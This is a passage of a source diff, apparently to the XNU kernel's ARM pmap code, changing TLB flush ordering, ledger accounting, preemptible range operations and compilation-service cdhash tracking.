task_ledgers.phys_mem, num_removed * pmap_page_size * PAGE_RATIO); + pmap_ledger_debit(pmap, task_ledgers.phys_mem, num_removed * pmap_page_size); if (pmap != kernel_pmap) { + if ((refcnt != 0) && (OSAddAtomic16(refcnt, (SInt16 *) &(ptep_get_info(bpte)->refcnt)) <= 0)) { + panic("pmap_remove_range_options: over-release of ptdp %p for pte [%p, %p)", ptep_get_ptd(bpte), bpte, epte); + } /* update pmap stats... */ OSAddAtomic(-num_unwired, (SInt32 *) &pmap->stats.wired_count); if (num_external) { @@ -6675,17 +6973,17 @@ pmap_remove_range_options( orig_compressed); } /* ... and ledgers */ - pmap_ledger_debit(pmap, task_ledgers.wired_mem, (num_unwired) * pmap_page_size * PAGE_RATIO); - pmap_ledger_debit(pmap, task_ledgers.internal, (num_internal) * pt_attr_page_size(pt_attr) * PAGE_RATIO); - pmap_ledger_debit(pmap, task_ledgers.alternate_accounting, (num_alt_internal) * pt_attr_page_size(pt_attr) * PAGE_RATIO); - pmap_ledger_debit(pmap, task_ledgers.alternate_accounting_compressed, (num_alt_compressed) * pt_attr_page_size(pt_attr) * PAGE_RATIO); - pmap_ledger_debit(pmap, task_ledgers.internal_compressed, (num_compressed) * pt_attr_page_size(pt_attr) * PAGE_RATIO); + pmap_ledger_debit(pmap, task_ledgers.wired_mem, (num_unwired) * pmap_page_size); + pmap_ledger_debit(pmap, task_ledgers.internal, (num_internal) * pmap_page_size); + pmap_ledger_debit(pmap, task_ledgers.alternate_accounting, (num_alt_internal) * pmap_page_size); + pmap_ledger_debit(pmap, task_ledgers.alternate_accounting_compressed, (num_alt_compressed) * pmap_page_size); + pmap_ledger_debit(pmap, task_ledgers.internal_compressed, (num_compressed) * pmap_page_size); /* make needed adjustments to phys_footprint */ pmap_ledger_debit(pmap, task_ledgers.phys_footprint, ((num_internal - num_alt_internal) + (num_compressed - - num_alt_compressed)) * pmap_page_size * PAGE_RATIO); + num_alt_compressed)) * pmap_page_size); } /* flush the ptable entries we have written */ @@ -6713,20 +7011,19 @@ pmap_remove( pmap_remove_options(pmap, start, end, PMAP_OPTIONS_REMOVE); } -MARK_AS_PMAP_TEXT static int +MARK_AS_PMAP_TEXT static vm_map_address_t pmap_remove_options_internal( pmap_t pmap, vm_map_address_t start, vm_map_address_t end, int options) { - int remove_count = 0; + vm_map_address_t eva = end; pt_entry_t *bpte, *epte; pt_entry_t *pte_p; tt_entry_t *tte_p; - uint32_t rmv_spte = 0; + int remove_count = 0; bool need_strong_sync = false; - bool flush_tte = false; if (__improbable(end < start)) { panic("%s: invalid address range %p, %p", __func__, (void*)start, (void*)end); @@ -6749,13 +7046,12 @@ pmap_remove_options_internal( bpte = &pte_p[pte_index(pmap, pt_attr, start)]; epte = bpte + ((end - start) >> pt_attr_leaf_shift(pt_attr)); - remove_count += pmap_remove_range_options(pmap, start, bpte, epte, - &rmv_spte, &need_strong_sync, options); + remove_count = pmap_remove_range_options(pmap, start, bpte, epte, &eva, + &need_strong_sync, options); - if (rmv_spte && (ptep_get_info(pte_p)->refcnt == 0) && - (pmap != kernel_pmap) && (pmap->nested == FALSE)) { - pmap_tte_deallocate(pmap, tte_p, pt_attr_twig_level(pt_attr)); - flush_tte = true; + if ((pmap != kernel_pmap) && (pmap->nested == FALSE) && (ptep_get_info(pte_p)->refcnt == 0)) { + pmap_tte_deallocate(pmap, start, eva, need_strong_sync, tte_p, pt_attr_twig_level(pt_attr)); + remove_count = 0; // pmap_tte_deallocate has flushed the TLB for us } } @@ -6763,12 +7059,9 @@ done: pmap_unlock(pmap); if (remove_count > 0) { - PMAP_UPDATE_TLBS(pmap, start, end, need_strong_sync); - } else if (flush_tte) { - pmap_get_pt_ops(pmap)->flush_tlb_tte_async(start, pmap); - sync_tlb_flush(); + PMAP_UPDATE_TLBS(pmap, start, eva, need_strong_sync); } - return remove_count; + return eva; } void @@ -6778,7 +7071,6 @@ pmap_remove_options( vm_map_address_t end, int options) { - int remove_count = 0; vm_map_address_t va; if (pmap == PMAP_NULL) { @@ -6801,6 +7093,7 @@ pmap_remove_options( pmap, (uint64_t)start, (uint64_t)end); } #endif + assert(get_preemption_level() == 0); /* * Invalidate the translation buffer first @@ -6815,14 +7108,12 @@ pmap_remove_options( } #if XNU_MONITOR - remove_count += pmap_remove_options_ppl(pmap, va, l, options); + va = pmap_remove_options_ppl(pmap, va, l, options); pmap_ledger_check_balance(pmap); #else - remove_count += pmap_remove_options_internal(pmap, va, l, options); + va = pmap_remove_options_internal(pmap, va, l, options); #endif - - va = l; } PMAP_TRACE(2, PMAP_CODE(PMAP__REMOVE) | DBG_FUNC_END); @@ -7061,6 +7352,8 @@ pmap_page_protect_options_with_flush_range( remove = FALSE; break; default: + /* PPL security model requires that we flush TLBs before we exit if the page may be recycled. */ + options = options & ~PMAP_OPTIONS_NOFLUSH; remove = TRUE; break; } @@ -7326,13 +7619,17 @@ pmap_page_protect_options_with_flush_range( if (*pte_p != ARM_PTE_TYPE_FAULT && !ARM_PTE_IS_COMPRESSED(*pte_p, pte_p) && *pte_p != tmplate) { - WRITE_PTE_STRONG(pte_p, tmplate); + if (options & PMAP_OPTIONS_NOFLUSH) { + WRITE_PTE_FAST(pte_p, tmplate); + } else { + WRITE_PTE_STRONG(pte_p, tmplate); + } update = TRUE; } } /* Invalidate TLBs for all CPUs using it */ - if (update) { + if (update && !(options & PMAP_OPTIONS_NOFLUSH)) { if (remove || !flush_range || ((flush_range->ptfr_pmap != pmap) || va >= flush_range->ptfr_end || va < flush_range->ptfr_start)) { pmap_get_pt_ops(pmap)->flush_tlb_region_async(va, @@ -7373,15 +7670,26 @@ protect_skip_pve: } } - UNLOCK_PVH(pai); - if (flush_range && tlb_flush_needed) { if (!remove) { flush_range->ptfr_flush_needed = true; tlb_flush_needed = FALSE; } } - if (tlb_flush_needed) { + + /* + * If we removed PV entries, ensure prior TLB flushes are complete before we drop the PVH + * lock to allow the backing pages to be repurposed. This is a security precaution, aimed + * primarily at XNU_MONITOR configurations, to reduce the likelihood of an attacker causing + * a page to be repurposed while it is still live in the TLBs. + */ + if (remove && tlb_flush_needed) { + sync_tlb_flush(); + } + + UNLOCK_PVH(pai); + + if (!remove && tlb_flush_needed) { sync_tlb_flush(); } @@ -7394,8 +7702,19 @@ MARK_AS_PMAP_TEXT static void pmap_page_protect_options_internal( ppnum_t ppnum, vm_prot_t prot, - unsigned int options) + unsigned int options, + void *arg) { + if (arg != NULL) { + /* + * If the argument is non-NULL, the VM layer is conveying its intention that the TLBs should + * ultimately be flushed. The nature of ARM TLB maintenance is such that we can flush the + * TLBs much more precisely if we do so inline with the pagetable updates, and PPL security + * model requires that we not exit the PPL without performing required TLB flushes anyway. + * In that case, force the flush to take place. + */ + options &= ~PMAP_OPTIONS_NOFLUSH; + } pmap_page_protect_options_with_flush_range(ppnum, prot, options, NULL); } @@ -7404,7 +7723,7 @@ pmap_page_protect_options( ppnum_t ppnum, vm_prot_t prot, unsigned int options, - __unused void *arg) + void *arg) { pmap_paddr_t phys = ptoa(ppnum); @@ -7425,9 +7744,9 @@ pmap_page_protect_options( PMAP_TRACE(2, PMAP_CODE(PMAP__PAGE_PROTECT) | DBG_FUNC_START, ppnum, prot); #if XNU_MONITOR - pmap_page_protect_options_ppl(ppnum, prot, options); + pmap_page_protect_options_ppl(ppnum, prot, options, arg); #else - pmap_page_protect_options_internal(ppnum, prot, options); + pmap_page_protect_options_internal(ppnum, prot, options, arg); #endif PMAP_TRACE(2, PMAP_CODE(PMAP__PAGE_PROTECT) | DBG_FUNC_END); @@ -7482,7 +7801,7 @@ pmap_protect( pmap_protect_options(pmap, b, e, prot, 0, NULL); } -MARK_AS_PMAP_TEXT static void +MARK_AS_PMAP_TEXT static vm_map_address_t pmap_protect_options_internal( pmap_t pmap, vm_map_address_t start, @@ -7526,7 +7845,7 @@ pmap_protect_options_internal( break; case VM_PROT_READ | VM_PROT_WRITE: case VM_PROT_ALL: - return; /* nothing to do */ + return end; /* nothing to do */ default: should_have_removed = TRUE; } @@ -7550,6 +7869,10 @@ pmap_protect_options_internal( set_NX = TRUE; } + const uint64_t pmap_page_size = PAGE_RATIO * pt_attr_page_size(pt_attr); + vm_map_address_t va = start; + unsigned int npages = 0; + VALIDATE_PMAP(pmap); pmap_lock(pmap); @@ -7563,7 +7886,12 @@ pmap_protect_options_internal( for (pte_p = bpte_p; pte_p < epte_p; - pte_p += PAGE_RATIO) { + pte_p += PAGE_RATIO, va += pmap_page_size) { + ++npages; + if (__improbable(!(npages % PMAP_DEFAULT_PREEMPTION_CHECK_PAGE_INTERVAL) && + pmap_pending_preemption())) { + break; + } pt_entry_t spte; #if DEVELOPMENT || DEBUG boolean_t force_write = FALSE; @@ -7708,11 +8036,14 @@ pmap_protect_options_internal( UNLOCK_PVH(pai); } } - FLUSH_PTE_RANGE_STRONG(bpte_p, epte_p); - PMAP_UPDATE_TLBS(pmap, start, end, need_strong_sync); + FLUSH_PTE_RANGE_STRONG(bpte_p, pte_p); + PMAP_UPDATE_TLBS(pmap, start, va, need_strong_sync); + } else { + va = end; } pmap_unlock(pmap); + return va; } void @@ -7733,6 +8064,8 @@ pmap_protect_options( pmap, (uint64_t)b, (uint64_t)e); } + assert(get_preemption_level() == 0); + #if DEVELOPMENT || DEBUG if (options & PMAP_OPTIONS_PROTECT_IMMEDIATE) { if ((prot & VM_PROT_ALL) == VM_PROT_NONE) { @@ -7771,12 +8104,10 @@ pmap_protect_options( } #if XNU_MONITOR - pmap_protect_options_ppl(pmap, beg, l, prot, options, args); + beg = pmap_protect_options_ppl(pmap, beg, l, prot, options, args); #else - pmap_protect_options_internal(pmap, beg, l, prot, options, args); + beg = pmap_protect_options_internal(pmap, beg, l, prot, options, args); #endif - - beg = l; } PMAP_TRACE(2, PMAP_CODE(PMAP__PROTECT) | DBG_FUNC_END); @@ -8127,6 +8458,12 @@ pmap_enter_options_internal( VALIDATE_PMAP(pmap); +#if XNU_MONITOR + if (__improbable((options & PMAP_OPTIONS_NOWAIT) == 0)) { + panic("pmap_enter_options() called without PMAP_OPTIONS_NOWAIT set"); + } +#endif + __unused const pt_attr_t * const pt_attr = pmap_get_pt_attr(pmap); if ((v) & pt_attr_leaf_offmask(pt_attr)) { @@ -8201,7 +8538,7 @@ Pmap_enter_retry: spte = *pte_p; - if (ARM_PTE_IS_COMPRESSED(spte, pte_p)) { + if (ARM_PTE_IS_COMPRESSED(spte, pte_p) && !refcnt_updated) { /* * "pmap" should be locked at this point, so this should * not race with another pmap_enter() or pmap_remove_range(). @@ -8235,7 +8572,7 @@ Pmap_enter_retry: } if ((spte != ARM_PTE_TYPE_FAULT) && (pte_to_pa(spte) != pa)) { - pmap_remove_range(pmap, v, pte_p, pte_p + PAGE_RATIO, 0); + pmap_remove_range(pmap, v, pte_p, pte_p + PAGE_RATIO); } pte = pa_to_pte(pa) | ARM_PTE_TYPE; @@ -8290,7 +8627,7 @@ Pmap_enter_retry: vm_map_address_t nest_vaddr; pt_entry_t *nest_pte_p; - nest_vaddr = v - pmap->nested_region_addr + pmap->nested_region_addr; + nest_vaddr = v; if ((nest_vaddr >= pmap->nested_region_addr) && (nest_vaddr < (pmap->nested_region_addr + pmap->nested_region_size)) @@ -8310,6 +8647,7 @@ Pmap_enter_retry: #endif if (prot & VM_PROT_WRITE) { if (pa_valid(pa) && (!pa_test_bits(pa, PP_ATTR_MODIFIED))) { + assert(!pmap->nested); /* no write access in a nested pmap */ if (fault_type & VM_PROT_WRITE) { if (set_XO) { pte |= pt_attr_leaf_rwna(pt_attr); @@ -8323,7 +8661,11 @@ Pmap_enter_retry: } else { pte |= pt_attr_leaf_ro(pt_attr); } - pa_set_bits(pa, PP_ATTR_REFERENCED); + /* + * Mark the page as MODFAULT so that a subsequent write + * may be handled through arm_fast_fault(). + */ + pa_set_bits(pa, PP_ATTR_REFERENCED | PP_ATTR_MODFAULT); pte_set_was_writeable(pte, true); } } else { @@ -9336,18 +9678,19 @@ phys_attribute_clear_with_flush_range( vm_prot_t allow_mode = VM_PROT_ALL; #if XNU_MONITOR - if (bits & PP_ATTR_PPL_OWNED_BITS) { + if (__improbable(bits & PP_ATTR_PPL_OWNED_BITS)) { panic("%s: illegal request, " "pn=%u, bits=%#x, options=%#x, arg=%p, flush_range=%p", __FUNCTION__, pn, bits, options, arg, flush_range); } #endif + if ((arg != NULL) || (flush_range != NULL)) { + options = options & ~PMAP_OPTIONS_NOFLUSH; + } - if ((bits & PP_ATTR_MODIFIED) && - (options & PMAP_OPTIONS_NOFLUSH) && - (arg == NULL) && - (flush_range == NULL)) { + if (__improbable((bits & PP_ATTR_MODIFIED) && + (options & PMAP_OPTIONS_NOFLUSH))) { panic("phys_attribute_clear(0x%x,0x%x,0x%x,%p,%p): " "should not clear 'modified' without flushing TLBs\n", pn, bits, options, arg, flush_range); @@ -9358,7 +9701,7 @@ phys_attribute_clear_with_flush_range( if (options & PMAP_OPTIONS_CLEAR_WRITE) { assert(bits == PP_ATTR_MODIFIED); - pmap_page_protect_options_with_flush_range(pn, (VM_PROT_ALL & ~VM_PROT_WRITE), 0, flush_range); + pmap_page_protect_options_with_flush_range(pn, (VM_PROT_ALL & ~VM_PROT_WRITE), options, flush_range); /* * We short circuit this case; it should not need to * invoke arm_force_fast_fault, so just clear the modified bit. @@ -9402,7 +9745,7 @@ phys_attribute_clear_internal( } #if __ARM_RANGE_TLBI__ -MARK_AS_PMAP_TEXT static void +MARK_AS_PMAP_TEXT static vm_map_address_t phys_attribute_clear_twig_internal( pmap_t pmap, vm_map_address_t start, @@ -9415,12 +9758,15 @@ phys_attribute_clear_twig_internal( const pt_attr_t * const pt_attr = pmap_get_pt_attr(pmap); assert(end >= start); assert((end - start) <= pt_attr_twig_size(pt_attr)); + const uint64_t pmap_page_size = pt_attr_page_size(pt_attr); + vm_map_address_t va = start; pt_entry_t *pte_p, *start_pte_p, *end_pte_p, *curr_pte_p; tt_entry_t *tte_p; tte_p = pmap_tte(pmap, start); + unsigned int npages = 0; if (tte_p == (tt_entry_t *) NULL) { - return; + return end; } if ((*tte_p & ARM_TTE_TYPE_MASK) == ARM_TTE_TYPE_TABLE) { @@ -9429,7 +9775,10 @@ phys_attribute_clear_twig_internal( start_pte_p = &pte_p[pte_index(pmap, pt_attr, start)]; end_pte_p = start_pte_p + ((end - start) >> pt_attr_leaf_shift(pt_attr)); assert(end_pte_p >= start_pte_p); - for (curr_pte_p = start_pte_p; curr_pte_p < end_pte_p; curr_pte_p++) { + for (curr_pte_p = start_pte_p; curr_pte_p < end_pte_p; curr_pte_p++, va += pmap_page_size) { + if (__improbable(npages++ && pmap_pending_preemption())) { + return va; + } pmap_paddr_t pa = pte_to_pa(*((volatile pt_entry_t*)curr_pte_p)); if (pa_valid(pa)) { ppnum_t pn = (ppnum_t) atop(pa); @@ -9437,9 +9786,10 @@ phys_attribute_clear_twig_internal( } } } + return end; } -MARK_AS_PMAP_TEXT static void +MARK_AS_PMAP_TEXT static vm_map_address_t phys_attribute_clear_range_internal( pmap_t pmap, vm_map_address_t start, @@ -9471,17 +9821,21 @@ phys_attribute_clear_range_internal( curr_end = end; } - phys_attribute_clear_twig_internal(pmap, va, curr_end, bits, options, &flush_range); - va = curr_end; + va = phys_attribute_clear_twig_internal(pmap, va, curr_end, bits, options, &flush_range); + if ((va < curr_end) || pmap_pending_preemption()) { + break; + } } pmap_unlock_ro(pmap); if (flush_range.ptfr_flush_needed) { + flush_range.ptfr_end = va; pmap_get_pt_ops(pmap)->flush_tlb_region_async( flush_range.ptfr_start, flush_range.ptfr_end - flush_range.ptfr_start, flush_range.ptfr_pmap); sync_tlb_flush(); } + return va; } static void @@ -9492,13 +9846,17 @@ phys_attribute_clear_range( unsigned int bits, unsigned int options) { + assert(get_preemption_level() == 0); + PMAP_TRACE(3, PMAP_CODE(PMAP__ATTRIBUTE_CLEAR_RANGE) | DBG_FUNC_START, bits); + while (start < end) { #if XNU_MONITOR - phys_attribute_clear_range_ppl(pmap, start, end, bits, options); + start = phys_attribute_clear_range_ppl(pmap, start, end, bits, options); #else - phys_attribute_clear_range_internal(pmap, start, end, bits, options); + start = phys_attribute_clear_range_internal(pmap, start, end, bits, options); #endif + } PMAP_TRACE(3, PMAP_CODE(PMAP__ATTRIBUTE_CLEAR_RANGE) | DBG_FUNC_END); } @@ -10168,8 +10526,9 @@ arm_force_fast_fault_with_flush_range( #endif /* MACH_ASSERT && XNU_MONITOR */ if (result && update_pte) { - if (*pte_p != ARM_PTE_TYPE_FAULT && - !ARM_PTE_IS_COMPRESSED(*pte_p, pte_p)) { + if (options & PMAP_OPTIONS_NOFLUSH) { + WRITE_PTE_FAST(pte_p, tmplate); + } else { WRITE_PTE_STRONG(pte_p, tmplate); if (!flush_range || ((flush_range->ptfr_pmap != pmap) || va >= flush_range->ptfr_end || va < flush_range->ptfr_start)) { @@ -10177,9 +10536,6 @@ arm_force_fast_fault_with_flush_range( pt_attr_page_size(pt_attr) * PAGE_RATIO, pmap); } tlb_flush_needed = TRUE; - } else { - WRITE_PTE(pte_p, tmplate); - __builtin_arm_isb(ISB_SY); } } @@ -10238,7 +10594,7 @@ arm_force_fast_fault_internal( vm_prot_t allow_mode, int options) { - if (__improbable((options & PMAP_OPTIONS_FF_LOCKED) != 0)) { + if (__improbable((options & (PMAP_OPTIONS_FF_LOCKED | PMAP_OPTIONS_NOFLUSH)) != 0)) { panic("arm_force_fast_fault(0x%x, 0x%x, 0x%x): invalid options", ppnum, allow_mode, options); } return arm_force_fast_fault_with_flush_range(ppnum, allow_mode, options, NULL); @@ -10349,6 +10705,7 @@ arm_clear_fast_fault( if (pmap == kernel_pmap) { tmplate = ((spte & ~ARM_PTE_APMASK) | ARM_PTE_AP(AP_RWNA)); } else { + assert(!pmap->nested); /* no write access in a nested pmap */ tmplate = ((spte & ~ARM_PTE_APMASK) | pt_attr_leaf_rw(pmap_get_pt_attr(pmap))); } } @@ -10432,7 +10789,7 @@ arm_fast_fault_internal( pmap_paddr_t pa; VALIDATE_PMAP(pmap); - pmap_lock(pmap); + pmap_lock_ro(pmap); /* * If the entry doesn't exist, is completely invalid, or is already @@ -10448,12 +10805,12 @@ arm_fast_fault_internal( if ((spte == ARM_PTE_TYPE_FAULT) || ARM_PTE_IS_COMPRESSED(spte, ptep)) { - pmap_unlock(pmap); + pmap_unlock_ro(pmap); return result; } if (!pa_valid(pa)) { - pmap_unlock(pmap); + pmap_unlock_ro(pmap); #if XNU_MONITOR if (pmap_cache_attributes((ppnum_t)atop(pa)) & PP_ATTR_MONITOR) { return KERN_PROTECTION_FAILURE; @@ -10466,13 +10823,13 @@ arm_fast_fault_internal( break; } } else { - pmap_unlock(pmap); + pmap_unlock_ro(pmap); return result; } - if ((IS_REFFAULT_PAGE(pai)) || - ((fault_type & VM_PROT_WRITE) && IS_MODFAULT_PAGE(pai))) { + if ((result != KERN_SUCCESS) && + ((IS_REFFAULT_PAGE(pai)) || ((fault_type & VM_PROT_WRITE) && IS_MODFAULT_PAGE(pai)))) { /* * An attempted access will always clear ref/mod fault state, as * appropriate for the fault type. arm_clear_fast_fault will @@ -10500,8 +10857,39 @@ arm_fast_fault_internal( } } + /* + * If the PTE already has sufficient permissions, we can report the fault as handled. + * This may happen, for example, if multiple threads trigger roughly simultaneous faults + * on mappings of the same page + */ + if ((result == KERN_FAILURE) && (spte & ARM_PTE_AF)) { + uintptr_t ap_ro, ap_rw, ap_x; + if (pmap == kernel_pmap) { + ap_ro = ARM_PTE_AP(AP_RONA); + ap_rw = ARM_PTE_AP(AP_RWNA); + ap_x = ARM_PTE_NX; + } else { + ap_ro = pt_attr_leaf_ro(pmap_get_pt_attr(pmap)); + ap_rw = pt_attr_leaf_rw(pmap_get_pt_attr(pmap)); + ap_x = pt_attr_leaf_x(pmap_get_pt_attr(pmap)); + } + /* + * NOTE: this doesn't currently handle user-XO mappings. Depending upon the + * hardware they may be xPRR-protected, in which case they'll be handled + * by the is_pte_xprr_protected() case above. Additionally, the exception + * handling path currently does not call arm_fast_fault() without at least + * VM_PROT_READ in fault_type. + */ + if (((spte & ARM_PTE_APMASK) == ap_rw) || + (!(fault_type & VM_PROT_WRITE) && ((spte & ARM_PTE_APMASK) == ap_ro))) { + if (!(fault_type & VM_PROT_EXECUTE) || ((spte & ARM_PTE_XMASK) == ap_x)) { + result = KERN_SUCCESS; + } + } + } + UNLOCK_PVH(pai); - pmap_unlock(pmap); + pmap_unlock_ro(pmap); return result; } @@ -10950,7 +11338,6 @@ pmap_trim_range( adjust_offmask = pt_attr_leaf_table_offmask(pt_attr); adjusted_start = ((start + adjust_offmask) & ~adjust_offmask); adjusted_end = end & ~adjust_offmask; - bool modified = false; /* Iterate over the range, trying to remove TTEs. */ for (cur = adjusted_start; (cur < adjusted_end) && (cur >= adjusted_start); cur += pt_attr_twig_size(pt_attr)) { @@ -10969,14 +11356,11 @@ pmap_trim_range( (pmap != kernel_pmap)) { if (pmap->nested == TRUE) { /* Deallocate for the nested map. */ - pmap_tte_deallocate(pmap, tte_p, pt_attr_twig_level(pt_attr)); + pmap_tte_deallocate(pmap, cur, cur + PAGE_SIZE, false, tte_p, pt_attr_twig_level(pt_attr)); } else { /* Just remove for the parent map. */ - pmap_tte_remove(pmap, tte_p, pt_attr_twig_level(pt_attr)); + pmap_tte_remove(pmap, cur, cur + PAGE_SIZE, false, tte_p, pt_attr_twig_level(pt_attr)); } - - pmap_get_pt_ops(pmap)->flush_tlb_tte_async(cur, pmap); - modified = true; } } @@ -10984,10 +11368,6 @@ done: pmap_unlock(pmap); } - if (modified) { - sync_tlb_flush(); - } - #if (__ARM_VMSA__ > 7) /* Remove empty L2 TTs. */ adjusted_start = ((start + pt_attr_ln_offmask(pt_attr, PMAP_TT_L1_LEVEL)) & ~pt_attr_ln_offmask(pt_attr, PMAP_TT_L1_LEVEL)); @@ -11030,8 +11410,7 @@ done: } if (remove_tt1e) { - pmap_tte_deallocate(pmap, tt1e_p, PMAP_TT_L1_LEVEL); - PMAP_UPDATE_TLBS(pmap, cur, cur + PAGE_SIZE, false); + pmap_tte_deallocate(pmap, cur, cur + PAGE_SIZE, false, tt1e_p, PMAP_TT_L1_LEVEL); } pmap_unlock(pmap); @@ -11229,7 +11608,7 @@ static void * pmap_sign_user_ptr_internal(void *value, ptrauth_key key, uint64_t discriminator, uint64_t jop_key) { void *res = NULL; - boolean_t current_intr_state = ml_set_interrupts_enabled(FALSE); + uint64_t current_intr_state = pmap_interrupts_disable(); uint64_t saved_jop_state = ml_enable_user_jop_key(jop_key); switch (key) { @@ -11244,7 +11623,7 @@ pmap_sign_user_ptr_internal(void *value, ptrauth_key key, uint64_t discriminator } ml_disable_user_jop_key(jop_key, saved_jop_state); - ml_set_interrupts_enabled(current_intr_state); + pmap_interrupts_restore(current_intr_state); return res; } @@ -11263,13 +11642,13 @@ pmap_auth_user_ptr_internal(void *value, ptrauth_key key, uint64_t discriminator } void *res = NULL; - boolean_t current_intr_state = ml_set_interrupts_enabled(FALSE); + uint64_t current_intr_state = pmap_interrupts_disable(); uint64_t saved_jop_state = ml_enable_user_jop_key(jop_key); res = ml_auth_ptr_unchecked(value, key, discriminator); ml_disable_user_jop_key(jop_key, saved_jop_state); - ml_set_interrupts_enabled(current_intr_state); + pmap_interrupts_restore(current_intr_state); return res; } @@ -11974,19 +12353,6 @@ flush_mmu_tlb_region_asid_async( #endif } -MARK_AS_PMAP_TEXT static void -flush_mmu_tlb_tte_asid_async(vm_offset_t va, pmap_t pmap) -{ -#if (__ARM_VMSA__ == 7) - flush_mmu_tlb_entry_async((va & ~ARM_TT_L1_PT_OFFMASK) | (pmap->hw_asid & 0xff)); - flush_mmu_tlb_entry_async(((va & ~ARM_TT_L1_PT_OFFMASK) + ARM_TT_L1_SIZE) | (pmap->hw_asid & 0xff)); - flush_mmu_tlb_entry_async(((va & ~ARM_TT_L1_PT_OFFMASK) + 2 * ARM_TT_L1_SIZE) | (pmap->hw_asid & 0xff)); - flush_mmu_tlb_entry_async(((va & ~ARM_TT_L1_PT_OFFMASK) + 3 * ARM_TT_L1_SIZE) | (pmap->hw_asid & 0xff)); -#else - flush_mmu_tlb_entry_async(tlbi_addr(va & ~pt_attr_twig_offmask(pmap_get_pt_attr(pmap))) | tlbi_asid(pmap->hw_asid)); -#endif -} - MARK_AS_PMAP_TEXT static void flush_mmu_tlb_full_asid_async(pmap_t pmap) { @@ -13177,7 +13543,7 @@ pmap_ppl_lockdown_page(vm_address_t kva) UNLOCK_PVH(pai); - pmap_page_protect_options_internal((ppnum_t)atop(pa), VM_PROT_READ, 0); + pmap_page_protect_options_internal((ppnum_t)atop(pa), VM_PROT_READ, 0, NULL); } /* @@ -13400,15 +13766,15 @@ pmap_advise_pagezero_range(__unused pmap_t p, __unused uint64_t a) #define PMAP_PGTRACE_LOCK(p) \ do { \ - *(p) = ml_set_interrupts_enabled(false); \ + *(p) = pmap_interrupts_disable(); \ if (simple_lock_try(&(pmap_pgtrace.lock), LCK_GRP_NULL)) break; \ - ml_set_interrupts_enabled(*(p)); \ + pmap_interrupts_restore(*(p)); \ } while (true) #define PMAP_PGTRACE_UNLOCK(p) \ do { \ simple_unlock(&(pmap_pgtrace.lock)); \ - ml_set_interrupts_enabled(*(p)); \ + pmap_interrupts_restore(*(p)); \ } while (0) #define PGTRACE_WRITE_PTE(pte_p, pte_entry) \ @@ -13502,7 +13868,7 @@ pmap_pgtrace_find_page(pmap_paddr_t pa) static bool pmap_pgtrace_enter_clone(pmap_t pmap, vm_map_offset_t va_page, vm_map_offset_t start, vm_map_offset_t end) { - bool ints; + uint64_t ints; queue_head_t *q = &(pmap_pgtrace.pages); pmap_paddr_t pa_page; pt_entry_t *ptep, *cptep; @@ -13631,7 +13997,7 @@ pmap_pgtrace_enter_clone(pmap_t pmap, vm_map_offset_t va_page, vm_map_offset_t s static void pmap_pgtrace_remove_clone(pmap_t pmap, pmap_paddr_t pa, vm_map_offset_t va) { - bool ints, found = false; + uint64_t ints, found = false; pmap_pgtrace_page_t *p; pt_entry_t *ptep; @@ -13691,7 +14057,7 @@ unlock_exit: static void pmap_pgtrace_remove_all_clone(pmap_paddr_t pa) { - bool ints; + uint64_t ints; pmap_pgtrace_page_t *p; pt_entry_t *ptep; @@ -14027,7 +14393,7 @@ pmap_pgtrace_add_page(pmap_t pmap, vm_map_offset_t start, vm_map_offset_t end) int ret = 0; pt_entry_t *ptep; queue_head_t *q = &(pmap_pgtrace.pages); - bool ints; + uint64_t ints; vm_map_offset_t cur_page, end_page; if (start > end) { @@ -14182,7 +14548,7 @@ int pmap_pgtrace_delete_page(pmap_t pmap, vm_map_offset_t start, vm_map_offset_t end) { int ret = 0; - bool ints; + uint64_t ints; queue_head_t *q = &(pmap_pgtrace.pages); pmap_pgtrace_page_t *p; vm_map_offset_t cur_page, end_page; @@ -14250,7 +14616,7 @@ pmap_pgtrace_fault(pmap_t pmap, vm_map_offset_t va, arm_saved_state_t *ss) pt_entry_t *ptep; pgtrace_run_result_t res; pmap_pgtrace_page_t *p; - bool ints, found = false; + uint64_t ints, found = false; pmap_paddr_t pa; // Quick check if we are interested @@ -14703,6 +15069,53 @@ pmap_lookup_in_static_trust_cache(const uint8_t cdhash[CS_CDHASH_LEN]) #endif } +MARK_AS_PMAP_TEXT static void +pmap_set_compilation_service_cdhash_internal(const uint8_t cdhash[CS_CDHASH_LEN]) +{ + pmap_simple_lock(&pmap_compilation_service_cdhash_lock); + memcpy(pmap_compilation_service_cdhash, cdhash, CS_CDHASH_LEN); + pmap_simple_unlock(&pmap_compilation_service_cdhash_lock); + + pmap_cs_log("Added Compilation Service CDHash through the PPL: 0x%02X 0x%02X 0x%02X 0x%02X", cdhash[0], cdhash[1], cdhash[2], cdhash[4]); +} + +MARK_AS_PMAP_TEXT static bool +pmap_match_compilation_service_cdhash_internal(const uint8_t cdhash[CS_CDHASH_LEN]) +{ + bool match = false; + + pmap_simple_lock(&pmap_compilation_service_cdhash_lock); + if (bcmp(pmap_compilation_service_cdhash, cdhash, CS_CDHASH_LEN) == 0) { + match = true; + } + pmap_simple_unlock(&pmap_compilation_service_cdhash_lock); + + if (match) { + pmap_cs_log("Matched Compilation Service CDHash through the PPL"); + } + + return match; +} + +void +pmap_set_compilation_service_cdhash(const uint8_t cdhash[CS_CDHASH_LEN]) +{ +#if XNU_MONITOR + pmap_set_compilation_service_cdhash_ppl(cdhash); +#else + pmap_set_compilation_service_cdhash_internal(cdhash); +#endif +} + +bool +pmap_match_compilation_service_cdhash(const uint8_t cdhash[CS_CDHASH_LEN]) +{ +#if XNU_MONITOR + return pmap_match_compilation_service_cdhash_ppl(cdhash); +#else + return pmap_match_compilation_service_cdhash_internal(cdhash); +#endif +} MARK_AS_PMAP_TEXT static void pmap_footprint_suspend_internal( @@ -14869,7 +15282,7 @@ pmap_test_access(pmap_t pmap, vm_map_address_t va, bool should_fault, bool is_wr * disable interrupts and preemption to avoid any unexpected memory * accesses. */ - boolean_t old_int_state = ml_set_interrupts_enabled(false); + uint64_t old_int_state = pmap_interrupts_disable(); pmap_t old_pmap = current_pmap(); mp_disable_preemption(); pmap_switch(pmap); @@ -14898,7 +15311,7 @@ pmap_test_access(pmap_t pmap, vm_map_address_t va, bool should_fault, bool is_wr pmap_switch(old_pmap); mp_enable_preemption(); - ml_set_interrupts_enabled(old_int_state); + pmap_interrupts_restore(old_int_state); bool retval = (took_fault == should_fault); return retval; } @@ -15233,3 +15646,76 @@ pmap_test(void) return KERN_SUCCESS; } #endif /* CONFIG_XNUPOST */ + +/* + * The following function should never make it to RELEASE code, since + * it provides a way to get the PPL to modify text pages. + */ +#if DEVELOPMENT || DEBUG + +#define 